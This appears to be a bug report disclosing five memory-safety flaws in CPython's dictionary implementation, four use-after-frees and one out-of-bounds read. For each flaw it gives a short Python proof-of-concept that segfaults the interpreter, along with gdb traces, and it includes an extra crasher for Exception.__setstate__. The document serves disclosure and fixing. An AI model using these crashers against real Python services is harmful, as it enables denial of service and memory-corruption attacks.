Here I'll describe five distinct issues I found. Common to them all is that they
reside in the built-in dictionary object.
Four of them are use-after-frees and one is an array-out-of-bounds indexing bug.
All of the described functions reside in Objects/dictobject.c.
Issue 1: use-after-free when initializing a dictionary
Initialization of a dictionary happens via the function dict_init which calls
dict_update_common. From there, PyDict_MergeFromSeq2 may be called, and that is
where this issue resides.
In PyDict_MergeFromSeq2 we retrieve a sequence of size 2 with this line:
fast = PySequence_Fast(item, "");
After checking its size, we take out a key and value:
key = PySequence_Fast_GET_ITEM(fast, 0);
value = PySequence_Fast_GET_ITEM(fast, 1);
Then we call PyDict_GetItem. This calls back into Python code if the key defines
a __hash__ method. From there the "item" sequence could get modified. Since
"key" and "value" are only borrowed references, either of them could then be
used after having been freed.
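To make the callback visible without triggering the bug, here is a minimal sketch that only records when __hash__ runs during dict([pair]). The names Key and calls are illustrative and do not come from the affected code; nothing is mutated, so this should be safe to run.

```python
# Sketch: building a dict from a sequence of pairs runs user-defined
# __hash__ code. `Key` and `calls` are illustrative names.
calls = []

class Key:
    def __hash__(self):
        # Arbitrary Python code runs here, in the middle of the C-level
        # dict construction. The PoC uses this spot to empty the pair.
        calls.append("__hash__ called")
        return 13

pair = [Key(), 123]
d = dict([pair])

print(len(calls) >= 1)  # the hook ran at least once
print(len(d))           # number of entries inserted
```

Any code placed in that method executes while the C function still holds its borrowed "key" and "value" pointers.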
Here's a PoC:
---
class X:
    def __hash__(self):
        pair[:] = []
        return 13
pair = [X(), 123]
dict([pair])
---
It crashes while trying to use freed memory as a PyObject:
(gdb) run ./poc24.py
Program received signal SIGSEGV, Segmentation fault.
0x000000000048fe25 in insertdict (mp=mp@entry=0x7ffff6d5c4b8, key=key@entry=0x7ffff6d52538, hash=0xd,
value=value@entry=0x8d1ac0 <small_ints+6144>) at Objects/dictobject.c:831
831 MAINTAIN_TRACKING(mp, key, value);
(gdb) print *key
$26 = {_ob_next = 0xdbdbdbdbdbdbdbdb, _ob_prev = 0xdbdbdbdbdbdbdbdb, ob_refcnt = 0xdbdbdbdbdbdbdbdb,
ob_type = 0xdbdbdbdbdbdbdbdb}
Issue 2: use-after-free in dictitems_contains
In the function dictitems_contains we call PyDict_GetItem to look up a value in
the dictionary:
found = PyDict_GetItem((PyObject *)dv->dv_dict, key);
However, "found" is only a borrowed reference. We then go ahead and compare it:
return PyObject_RichCompareBool(value, found, Py_EQ);
But PyObject_RichCompareBool could call back into Python code and e.g. release
the GIL. As a result, the dictionary may be mutated. Thus "found" could get
freed.
Then, inside PyObject_RichCompareBool (actually in do_richcompare), the "found"
variable gets used after being freed.
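The difference between a borrowed and an owned reference can be modelled in pure Python. The sketch below is an analogy only: it uses weakref.ref to stand in for a borrowed pointer and an ordinary variable to stand in for a reference protected by Py_INCREF. It assumes CPython's reference counting, and the Value class is hypothetical.

```python
import weakref

class Value:
    """Stand-in for a dictionary value (illustrative)."""

# Model of a borrowed reference: it does not keep the object alive.
d = {0: Value()}
borrowed = weakref.ref(d[0])
d.clear()  # the dict held the only strong reference
borrowed_is_dead = borrowed() is None

# Model of an owned reference (the Py_INCREF analogue): the object survives.
d = {0: Value()}
owned = d[0]
d.clear()
owned_is_alive = isinstance(owned, Value)

print(borrowed_is_dead, owned_is_alive)
```

In C there is no such safety net: the borrowed pointer simply keeps pointing at freed memory, which is what the crash below shows.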
PoC:
---
class X:
    def __eq__(self, other):
        d.clear()
        return NotImplemented
d = {0: set()}
(0, X()) in d.items()
---
Result:
(gdb) run ./poc25.py
Program received signal SIGSEGV, Segmentation fault.
0x00000000004a03b6 in do_richcompare (v=v@entry=0x7ffff6d52468, w=w@entry=0x7ffff6ddf7c8, op=op@entry=0x2)
at Objects/object.c:673
673 if (!checked_reverse_op && (f = w->ob_type->tp_richcompare) != NULL) {
(gdb) print w->ob_type
$26 = (struct _typeobject *) 0xdbdbdbdbdbdbdbdb
Issue 3: use-after-free in dict_equal
In the function dict_equal, we call the "lookdict" function via
b->ma_keys->dk_lookup to look up a value:
if ((b->ma_keys->dk_lookup)(b, key, ep->me_hash, &vaddr) == NULL)
This value's address is stored into the "vaddr" variable and the value is
fetched into the "bval" variable:
bval = *vaddr;
Then we call Py_DECREF(key) which can call back into Python code. This could
release the GIL and mutate dictionary b. Therefore "bval" could become freed at
this point. We then proceed to use "bval":
cmp = PyObject_RichCompareBool(aval, bval, Py_EQ);
This results in a use-after-free.
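That a plain Py_DECREF can run arbitrary code is easy to observe from Python. A minimal sketch, assuming CPython's reference counting (other implementations may delay finalizers); Noisy and log are illustrative names:

```python
# Sketch: dropping the last reference runs __del__ synchronously on CPython.
log = []

class Noisy:
    def __del__(self):
        # Any Python code may run here, including code that clears a dict.
        log.append("__del__ ran")

obj = Noisy()
log.append("before del")
del obj  # refcount reaches zero, so the finalizer runs right here
log.append("after del")

print(log)
```

The finalizer entry lands between the two markers, which mirrors how dict_b.clear() in the PoC runs between the lookup and the comparison.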
PoC:
---
class X():
    def __del__(self):
        dict_b.clear()
    def __eq__(self, other):
        dict_a.clear()
        return True
    def __hash__(self):
        return 13
dict_a = {X(): 0}
dict_b = {X(): X()}
dict_a == dict_b
---
Result:
(gdb) run ./poc26.py
Program received signal SIGSEGV, Segmentation fault.
PyType_IsSubtype (a=0xdbdbdbdbdbdbdbdb, b=0x87ec60 <PyLong_Type>)
at Objects/typeobject.c:1343
1343 mro = a->tp_mro;
(gdb) print a
$59 = (PyTypeObject *) 0xdbdbdbdbdbdbdbdb
Issue 4: use-after-free in _PyDict_FromKeys
The function _PyDict_FromKeys takes an iterable as argument. If the iterable is
a dict, _PyDict_FromKeys loops over it like this:
    while (_PyDict_Next(iterable, &pos, &key, &oldvalue, &hash)) {
        if (insertdict(mp, key, hash, value)) {
            ...
        }
    }
However if we look at the comment for PyDict_Next, we see this:
* CAUTION: In general, it isn't safe to use PyDict_Next in a loop that
* mutates the dict.
But insertdict can call into Python code which might mutate the dict. In that
case we perform a use-after-free of the "key" variable.
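The route from an insertion into Python code is the key comparison that happens on a hash collision. The following sketch only records those comparisons and mutates nothing; Colliding and eq_calls are illustrative names.

```python
# Sketch: inserting a key whose hash collides with an existing key makes
# the dict call the user-defined __eq__.
eq_calls = []

class Colliding(int):
    def __hash__(self):
        return 13  # force every instance into the same hash slot
    def __eq__(self, other):
        # The PoC clears the source dict from this hook.
        eq_calls.append((int(self), int(other)))
        return False

d = {Colliding(1): 1, Colliding(2): 2}

print(len(eq_calls) >= 1)  # at least one comparison was needed
print(len(d))              # both keys were kept, since __eq__ returned False
```

Because __eq__ returns False, both keys are stored, yet the comparison itself is enough to run user code during the insert.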
Here's a PoC:
---
class X(int):
    def __hash__(self):
        return 13
    def __eq__(self, other):
        if len(d) > 1:
            d.clear()
        return False
d = {}
d = {X(1): 1, X(2): 2}
x = {}.fromkeys(d)
---
And the result:
(gdb) run ./poc27.py
Program received signal SIGSEGV, Segmentation fault.
0x0000000000435122 in visit_decref (op=0x7ffff6d5ca68, data=0x0) at Modules/gcmodule.c:373
373 if (PyObject_IS_GC(op)) {
(gdb) print *op
$115 = {_ob_next = 0xdbdbdbdbdbdbdbdb, _ob_prev = 0xdbdbdbdbdbdbdbdb, ob_refcnt = 0xdbdbdbdbdbdbdbdb,
ob_type = 0xdbdbdbdbdbdbdbdb}
An almost identical issue also exists further down in the function when calling
_PySet_NextEntry. To see this crash, just change "d" to be a set in the PoC
above:
d = set()
d = set([X(1), X(2)])
This likewise crashes with a use-after-free.
(Note: if you grep for PyDict_Next you will find more similar cases, although
many are in obscure modules or deprecated functions. I'm not sure those are
worth fixing? E.g. here's a crasher for BaseException_setstate which also calls
PyDict_Next:
---
class X(str):
    def __hash__(self):
        d.clear()
        return 13
d = {}
d[X()] = X()
e = Exception()
e.__setstate__(d)
---
end note.)
Issue 5: out-of-bounds indexing in dictiter_iternextitem
The function dictiter_iternextitem is used to iterate over a dictionary's items.
dictiter_iternextitem is careful to check that the dictionary did not change
size during iteration. However after performing this check, it calls Py_DECREF:
Py_DECREF(PyTuple_GET_ITEM(result, 0));
Py_DECREF(PyTuple_GET_ITEM(result, 1));
This can execute Python code and mutate the dict. If that happens, the index "i"
previously computed by dictiter_iternextitem could become invalid. It would then
index out of bounds with this line:
key = d->ma_keys->dk_entries[i].me_key;
Furthermore the "value_ptr" variable would have gone stale, too. Taking the
"value" variable out of it uses memory that has been freed:
value = *value_ptr;
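One reason the size check does not help is that it only notices changes in the number of entries. As a small Python-level illustration (plain strings, no finalizers, so nothing dangerous happens), replacing the value of an existing key during iteration raises no error. The names seen and error are illustrative.

```python
# Sketch: overwriting the value of an existing key keeps len(d) unchanged,
# so iteration over d.items() continues without a RuntimeError.
d = {i: str(i) for i in range(4)}
seen = []
error = None

try:
    for key, value in d.items():
        if key == 1:
            d[1] = None  # same key, same size; only the old value is released
        seen.append(key)
except RuntimeError as exc:
    error = exc

print(seen, error)
```

The PoC relies on this kind of size-preserving assignment to release X(2), whose __del__ then clears the dict.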
Here's a PoC which crashes with the "value" variable being an arbitrary pointer:
---
class X(int):
    def __del__(self):
        d.clear()
d = {i: X(i) for i in range(8)}
for result in d.items():
    if result[0] == 2:
        d[2] = None # free d[2] --> X(2).__del__ is called
---
The result:
(gdb) run ./poc29.py
Program received signal SIGSEGV, Segmentation fault.
dictiter_iternextitem (di=0x7ffff6d49cd8) at Objects/dictobject.c:3187
3187 Py_INCREF(key);
(gdb) print value
$12 = (PyObject *) 0x7b7b7b7b7b7b7b7b